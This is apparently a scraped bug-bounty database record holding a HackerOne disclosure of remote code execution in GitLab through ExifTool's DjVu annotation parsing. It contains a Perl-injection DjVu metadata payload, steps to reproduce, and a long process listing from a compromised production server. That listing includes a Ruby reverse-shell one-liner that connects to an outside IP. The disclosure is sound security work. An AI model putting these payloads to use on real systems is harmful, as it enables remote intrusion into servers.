"https://profile-photos.hackerone-user-content.com/variants/000/000/264/8dd359f496ba6c5b97c5126dc86924a00fd7ef26_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "vakzz", "url": "/vakzz", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/6zbovkumst7oljmo9v21pig3yh9j/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%2294971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg%22%3B%20filename%2A%3DUTF-8%27%2794971b5a75a669ea52903c09fc847f3434930258211181557be06162f5a8bac0.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ4DFZQC7I%2F20210514%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210514T232947Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEG8aCXVzLXdlc3QtMiJHMEUCICnBvVFCICsL78uSDtvXtEOsT7PnDGUSJj6T6AafEwLiAiEA3KeKsZx0lhYX4jY6DaS0w9dYDrC0okolC6pKlOpGi0wqgwQI%2BP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARACGgwwMTM2MTkyNzQ4NDkiDDcXjhQ0DQk%2F4ZN9OyrXA%2B%2BDQn5ycfkdLzM2U3VodgY4hQDpjT9aUasc2wQhwTBv5mboGgTonSX04IN6kwPgVkcfD5O9ShFJyc3kskYUaOdwEYIoD%2F6kygXfXuSOaoK8saLlENdTaEz4wwlX9YPXp%2BA9Kav%2Bcnb6x2mExv8SJwCbsJ8VxCDUJHp8L0%2B8uQD4ujfGXRe%2F5P5kw39Jd0TAJR08q3Ri%2FmErCppc%2FPb0KgYuqfNccAi9o89%2FFuhuAq9T18ngTSFKdvhA9sC1SpXDue1qKLyxVFUvoe9V9Lwr5%2F5ZR1aWqVpxUAkfb7WfLExmwPjgeh8RxgGiDO7b1yund2p2A1yQzD9gw0E%2Bml23v3GyJOfkimnM5S1y7KOH3Tkd6aWl0pNlYt8PaFNGKgNTOSFsen5nMWMHqqd7aN9jQxC9xHltQimk9CR2UcV%2F69u4P57uYzWQwZvoeWZyp8ZT0jLDndopoXkwtT4%2FWeh9h8Q%2B5%2BFavOVKjWpJEYCwFUE2une78PO4FiTlL5JMldzzuvJdWkf9WmKSGf%2FPlMSq1QHmEhN%2FwuIl9kE6cG6ryK6NpoqZLpvIecZSPTq3ZVuwn5oZkxltTXYIKRxL%2FOiakRp3pYdpUw1Y3d5SxAmVDYE6VJCW2dKG7DCc8vuEBjqlAW%2Ffhn5PsfRezdwpNwN1EhnemUBcDuC7TCB5UZk8ZURq48INKnhpXSDTSmRGyqoQQKHwc5Ouh8UlXV4UnN9vqcjaurenAk%2FgEfIqFzLIpRK%2BuuQzViz3TlYxZocnfmWjDpoblrpuCUj6BT89YgtDFSW9p7y2q9RMufddNVHPMSdZXxuWDYZ2rAEi5yb30Jg7P%2BdSA8xWNyzY%2F%2F7ME3TaaEat38Mr5g%3D%3D&X-Amz-Signature=1922c3a81b0c86a1b6c7d21bb074d52dbb577f7346454c65a03a75cc57d83818"}, "is_me?": false, "cleared": true, "hackerone_triager": false, "hacker_mediation": false}}, "lastseen": "2021-05-14T23:29:47", "differentElements": ["h1reporter"], "edition": 4}, {"bulletin": {"id": "H1:1154542", "hash": "abb4f4005811431f165103a419a9bfd5", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 1.8 2507012 1229264 ? Sl 12:49 12:43 puma: cluster worker 2: 7369 [gitlab-puma-worker]\ninfluxd+ 12182 0.0 0.0 188928 1044 ? Ssl 2020 0:14 /usr/bin/influxdb-relay -config /etc/influxdb-relay/influxdb-relay.conf\nroot 12322 0.0 0.0 0 0 ? I 12:49 0:00 [kworker/11:1]\nroot 12828 0.0 0.0 4384 1276 ? S 2020 0:01 svlogd -tt /var/log/gitlab/puma\nroot 12831 0.2 0.0 4384 1228 ? S 2020 1318:06 svlogd /var/log/gitlab/gitlab-workhorse\nroot 12853 0.0 0.0 4384 1260 ? S 2020 0:02 svlogd -tt /var/log/gitlab/nginx\nroot 12856 0.0 0.0 4384 340 ? S 2020 0:00 svlogd -tt /var/log/gitlab/logrotate\ngit 13196 48.0 2.1 2935068 1437312 ? Sl 12:17 27:28 puma: cluster worker 10: 7369 [gitlab-puma-worker]\nroot 13379 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/7:1]\nroot 13382 0.0 0.0 0 0 ? I 09:53 0:00 [kworker/10:1]\nroot 13611 1.0 0.0 1740892 38864 ? Ssl Jan29 1042:19 /usr/bin/process-exporter --config.path /etc/process-exporter/chef-configured.yaml --web.listen-address=:9256 -threads=false -gather-smaps=false\nroot 14478 0.0 0.0 0 0 ? I 09:24 0:00 [kworker/2:0]\ngit 17155 50.3 1.8 2541576 1218444 ? Sl 12:50 11:50 puma: cluster worker 15: 7369 [gitlab-puma-worker]\nroot 17904 0.0 0.0 0 0 ? 